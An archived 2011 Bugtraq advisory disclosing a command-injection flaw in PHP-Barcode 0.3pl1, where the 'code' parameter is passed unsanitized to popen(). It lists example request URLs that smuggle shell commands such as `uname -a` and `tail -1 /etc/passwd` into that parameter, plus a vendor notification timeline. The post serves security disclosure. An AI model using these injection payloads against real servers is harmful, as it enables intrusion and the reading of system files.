lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CA+FRxekFU71ERPAuHd1kWM_DM5_O38=PPnQTk4z9F6FJ6pqrKQ@mail.gmail.com>
Date: Mon, 25 Jul 2011 18:03:24 -0500
From: beford <xbefordx@...il.com>
To: bugs@...uritytracker.com, bugtraq@...urityfocus.com
Subject: PHP-Barcode 0.3pl1 Remote Code Execution

PHP-Barcode 0.3pl1 Remote Code Execution
=================================

The input passed to the code parameter is not sanitized and is used on
a popen() function. This allows remote command execution and also
allows to see environment vars:

Windows

http://www.site.com/php-barcode/barcode.php?code=%TMP%

Linux

http://www.site.com/php-barcode/barcode.php?code=012$PATH$d
http://www.site.com/php-barcode/barcode.php?code=`uname%20-a`
http://www.site.com/php-barcode/barcode.php?code=`tail%20-1%20/etc/passwd`

Vendor:
 http://www.ashberg.de/php-barcode/download/

Vendor informed:
 July  6 / 2011

Vendor acknowledgement:
 July 7 / 2011

Fix not available from vendor.

- beford

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ